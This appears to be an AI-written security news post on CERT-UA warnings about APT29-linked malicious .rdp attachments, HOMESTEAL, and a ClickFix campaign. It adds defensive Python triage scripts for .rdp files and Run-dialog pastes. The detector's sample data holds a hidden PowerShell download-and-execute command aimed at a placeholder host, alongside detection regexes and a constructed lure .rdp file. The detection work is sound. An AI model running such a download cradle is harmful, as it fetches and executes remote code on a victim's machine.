Ethical Hacking News
CERT-UA has issued a warning regarding a malicious email campaign targeting government agencies, enterprises, and military entities in Ukraine. The campaign, which CERT-UA tracks as UAC-0215 and which Amazon Web Services (AWS) has linked to the Russian nation-state hacking group APT29, uses Remote Desktop Protocol ('.rdp') configuration files as email attachments. The accompanying lure claims the files integrate popular services such as Amazon or Microsoft; in reality, opening one connects the victim's machine to a remote server under the attackers' control.
The same CERT-UA reporting covers two further, separate campaigns: one delivering a Visual Basic Script-based malware dubbed HOMESTEAL that exfiltrates documents and archives, and a ClickFix-style campaign in which a fake reCAPTCHA page tricks the user into running a PowerShell script ("Browser.ps1") that opens an SSH tunnel, steals data from web browsers, and downloads the Metasploit framework. CERT-UA has additionally warned of activity by a second Russian advanced persistent threat actor, APT28 (aka UAC-0001).
CERT-UA's warning describes a malicious email campaign targeting government agencies, enterprises, and military entities in Ukraine. The campaign, which began at least as far back as August 2024, delivers Remote Desktop Protocol ('.rdp') configuration files as attachments; the lure text claims the files will integrate popular services such as Amazon or Microsoft and implement a zero-trust architecture.
However, once opened, an .rdp file makes the victim's machine connect to a remote server, enabling the threat actors to gain remote access to the compromised host, steal data, and plant additional malware for follow-on attacks. The connection is outbound from the victim, so the attacker's RDP server is what gains access: an RDP session can expose the client's redirected local resources (drives, clipboard and similar) to the server it connects to. CERT-UA has attributed this campaign to a threat actor it tracks as UAC-0215, which Amazon Web Services (AWS) has linked to the Russian nation-state hacking group known as APT29.
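The setting names in an .rdp file are plain text, so a mail gateway or analyst can triage an attachment before anyone opens it. The script below is an added example, not CERT-UA's or AWS's code: it parses the documented mstsc.exe `name:type:value` lines, flags a `full address` outside an allow-list, and flags every resource-redirection setting that would let an untrusted server read or write the client's drives, clipboard, printers, smart cards or security keys, or run a RemoteApp of its choosing. The allow-list, both sample files, the hostnames and the program alias are constructed placeholders.

```python
"""Triage an .rdp attachment for the settings that turn a session with an
untrusted RDP server into a data-theft channel.

Added example, not CERT-UA's or AWS's code. Setting names are the documented
mstsc.exe .rdp keys; the allow-list, sample files and hostnames are
constructed placeholders."""
from __future__ import annotations

from dataclasses import dataclass, field

# Assumption: the organisation's only legitimate RDP gateway.
ALLOWED_HOSTS = {"rds.corp.example"}

# Integer settings that, when set to 1, hand local resources to the server.
RISKY_INT_SETTINGS = {
    "redirectclipboard": "clipboard shared with server",
    "redirectprinters": "printers shared with server",
    "redirectcomports": "COM ports shared with server",
    "redirectsmartcards": "smart cards usable by server",
    "redirectwebauthn": "WebAuthn/FIDO keys usable by server",
    "remoteapplicationmode": "RemoteApp mode hides the remote desktop from the user",
}


@dataclass
class RdpTriage:
    host: str | None = None
    port: int = 3389
    findings: list[str] = field(default_factory=list)

    @property
    def verdict(self) -> str:
        return "suspicious" if self.findings else "clean"


def read_rdp_file(path: str) -> str:
    """mstsc writes .rdp files as UTF-16LE with a BOM; also accept UTF-8/ANSI."""
    data = open(path, "rb").read()
    if data.startswith(b"\xff\xfe"):
        return data.decode("utf-16")
    try:
        return data.decode("utf-8-sig")
    except UnicodeDecodeError:
        return data.decode("latin-1")


def parse_rdp(text: str) -> dict[str, tuple[str, str]]:
    """Parse 'name:type:value' lines into {name: (type, value)}.
    Types are i (int), s (string), b (binary). mstsc silently skips lines it
    cannot parse, so the parser does the same rather than failing closed."""
    settings: dict[str, tuple[str, str]] = {}
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")
        if not line or line.startswith(";"):
            continue
        parts = line.split(":", 2)  # the value may itself contain ':' (host:port)
        if len(parts) != 3 or parts[1] not in ("i", "s", "b"):
            continue
        settings[parts[0].strip().lower()] = (parts[1], parts[2].strip())
    return settings


def triage_rdp(text: str, allowed_hosts=ALLOWED_HOSTS) -> RdpTriage:
    s = parse_rdp(text)
    t = RdpTriage()
    if "full address" in s:
        addr = s["full address"][1]
        host, sep, port = addr.rpartition(":")
        if not sep or not port.isdigit():  # no explicit port
            host, port = addr, ""
        t.host = host
        if port:
            t.port = int(port)
        if host.lower() not in allowed_hosts:
            t.findings.append(f"connects to untrusted host {host}:{t.port}")
    for name, why in RISKY_INT_SETTINGS.items():
        if s.get(name) == ("i", "1"):
            t.findings.append(f"{name}=1 ({why})")
    drives = s.get("drivestoredirect", ("s", ""))[1]
    if drives:  # '*' = every local drive, including removable and mapped ones
        t.findings.append(f"drivestoredirect={drives!r} (server can read and write local drives)")
    if s.get("remoteapplicationprogram", ("s", ""))[1]:
        t.findings.append("remoteapplicationprogram set (server-chosen program starts on connect)")
    return t


# Constructed samples; the hostname and program alias are placeholders.
SAMPLE_LURE = """\
full address:s:aws-secure-gateway.example:3389
prompt for credentials:i:0
remoteapplicationmode:i:1
remoteapplicationprogram:s:||StorageTest
drivestoredirect:s:*
redirectclipboard:i:1
redirectprinters:i:1
redirectsmartcards:i:1
redirectwebauthn:i:1
"""

SAMPLE_CLEAN = """\
full address:s:rds.corp.example
redirectclipboard:i:0
drivestoredirect:s:
"""

if __name__ == "__main__":
    for label, sample in (("lure", SAMPLE_LURE), ("clean", SAMPLE_CLEAN)):
        t = triage_rdp(sample)
        print(f"{label}: {t.verdict} ({t.host}:{t.port})")
        for f in t.findings:
            print("  -", f)
```

Run it against a real attachment with `triage_rdp(read_rdp_file(path))`. The parser deliberately mirrors mstsc's leniency (unknown or malformed lines are ignored, names are case-insensitive) so that an attacker cannot slip a setting past the check by reformatting it in a way the client would still accept.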
CERT-UA has separately described a phishing chain believed to be part of a larger-scale cyber attack aimed at stealing confidential information from Ukrainian users. The attack begins with a phishing email containing a link to a booby-trapped RAR archive that purports to hold bills or payment details. Present within the archive is a Visual Basic Script-based malware dubbed HOMESTEAL, designed to exfiltrate files matching certain extensions ("xls," "xlsx," "doc," "docx," "pdf," "txt," "csv," "rtf," "ods," "odt," "eml," "pst," "rar," and "zip") to an attacker-controlled server.
Furthermore, CERT-UA has also warned of a ClickFix-style campaign designed to trick users into clicking malicious links embedded in email messages, which leads to a PowerShell script capable of establishing an SSH tunnel, stealing data from web browsers, and downloading and launching the Metasploit penetration testing framework. Users who click the link are directed to a fake reCAPTCHA verification page prompting them to verify their identity by clicking on a button. This action copies the malicious PowerShell script ("Browser.ps1") to the user's clipboard and displays a popup window with instructions to execute it using the Run dialog box in Windows.
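A ClickFix paste leaves two traces worth hunting for: the command the user pasted into the Run dialog is recorded by explorer.exe under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, and the resulting process appears in process-creation telemetry (for example Sysmon Event ID 1) as PowerShell spawned directly by explorer.exe. The script below is an added example, not CERT-UA's detection logic: it scores a command line for the cues that typically appear together in such a paste (PowerShell with a hidden window, policy bypass, a download cradle fetching a remote .ps1, in-memory execution) and applies that scoring to both a RunMRU export and process events. The indicator list, the threshold and all sample data are this example's own constructed choices; the hostname is a placeholder.

```python
"""Flag ClickFix-style executions: a command the user was talked into pasting
into the Run dialog (Win+R), which explorer.exe records under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU and which
a process-creation log (e.g. Sysmon Event ID 1) shows as powershell.exe
spawned by explorer.exe.

Added example, not CERT-UA's detection logic. The indicator list, the score
threshold and the sample registry values are this example's own choices;
hostnames are placeholders."""
import re

# Each indicator present adds one point. The threshold is a triage choice.
INDICATORS = [
    ("powershell host", re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)),
    ("hidden window", re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)),
    ("encoded command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("execution policy bypass", re.compile(r"-e(xecution)?p(olicy)?\s+bypass\b", re.I)),
    ("download cradle", re.compile(
        r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|WebClient)\b", re.I)),
    ("in-memory execution", re.compile(r"\b(iex|Invoke-Expression)\b", re.I)),
    ("remote .ps1", re.compile(r"https?://\S+?\.ps1\b", re.I)),
    ("mshta/clipboard", re.compile(r"\b(mshta|Get-Clipboard)\b", re.I)),
]


def score_command(cmd: str) -> list[str]:
    """Names of the indicators present in one command line."""
    return [name for name, rx in INDICATORS if rx.search(cmd)]


def triage_process(parent_image: str, command_line: str, threshold: int = 3) -> dict:
    """Score one process-creation event. PowerShell launched straight from
    explorer.exe is how a Run-dialog paste shows up, so that adds a point."""
    hits = score_command(command_line)
    if hits and parent_image.lower().endswith(("\\explorer.exe", "/explorer.exe")):
        hits.append("spawned by explorer.exe (Run dialog)")
    return {"score": len(hits), "hits": hits, "alert": len(hits) >= threshold}


def triage_runmru(values: dict[str, str], threshold: int = 3) -> list[dict]:
    """values: RunMRU value name -> data, as exported from the registry.
    MRUList orders the slots most-recent first; each entry ends with a
    literal backslash-1 that explorer.exe appends."""
    flagged = []
    for slot in values.get("MRUList", ""):
        cmd = values.get(slot, "").removesuffix("\\1")
        hits = score_command(cmd)
        if len(hits) >= threshold:
            flagged.append({"slot": slot, "command": cmd, "hits": hits})
    return flagged


# Constructed RunMRU export: two ordinary entries and one ClickFix paste.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -ep bypass -c "iex (iwr http://captcha-check.example/Browser.ps1 -UseBasicParsing)"\\1',
}

# Constructed process-creation events: (parent image, command line).
SAMPLE_EVENTS = [
    ("C:\\Windows\\explorer.exe", SAMPLE_RUNMRU["c"].removesuffix("\\1")),
    ("C:\\Windows\\System32\\cmd.exe", "powershell -c Get-Date"),
]

if __name__ == "__main__":
    for hit in triage_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU slot {hit['slot']}: {hit['hits']}")
    for parent, cmd in SAMPLE_EVENTS:
        r = triage_process(parent, cmd)
        print(f"{'ALERT' if r['alert'] else 'ok   '} score={r['score']} {cmd[:60]}")
```

On a live host the RunMRU values can be read with `winreg` (or `reg export`) and fed straight into `triage_runmru`; the process-event path is meant to be wired to whatever produces parent-image and command-line pairs in the environment. Scoring several weak cues rather than matching one string keeps the logic useful when the lure changes its script name or download host.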
In addition, CERT-UA has issued a warning regarding another Russian advanced persistent threat actor known as APT28 (aka UAC-0001), which it believes to be behind further cyber offensives against Ukraine. These alerts come amid broader reporting on digital intrusions targeting Georgia's infrastructure and government between 2017 and 2020, some of which have been pinned on Turla.
Amazon Web Services has also moved to disrupt the operation by seizing the domains the adversary was using to impersonate AWS. CERT-UA's alerts highlight the importance of vigilance against sophisticated phishing campaigns and the need for organizations to implement robust security controls to prevent data breaches and cyber attacks.
In conclusion, this report highlights the evolving threat landscape in Ukraine, where attackers are utilizing increasingly sophisticated techniques to target government agencies, enterprises, and military entities. It serves as a reminder that cybersecurity is an ongoing process requiring constant monitoring and vigilance from organizations and individuals alike.
Related Information:
https://thehackernews.com/2024/10/cert-ua-identifies-malicious-rdp-files.html
https://cybermaterial.com/rdp-files-exploit-used-to-target-ukraine/
https://en.wikipedia.org/wiki/Metasploit
https://www.varonis.com/blog/what-is-metasploit
https://www.bleepingcomputer.com/news/security/amazon-seizes-domains-used-in-rogue-remote-desktop-campaign-to-steal-data/
https://attack.mitre.org/groups/G0016/
https://cloud.google.com/blog/topics/threat-intelligence/tracking-apt29-phishing-campaigns
https://portswigger.net/daily-swig/who-is-behind-apt29-what-we-know-about-this-nation-state-cybercrime-group
https://www.crowdstrike.com/en-us/blog/who-is-fancy-bear/
https://attack.mitre.org/groups/G0007/
Published: Sat Oct 26 12:10:37 2024 by llama3.2 3B Q4_K_M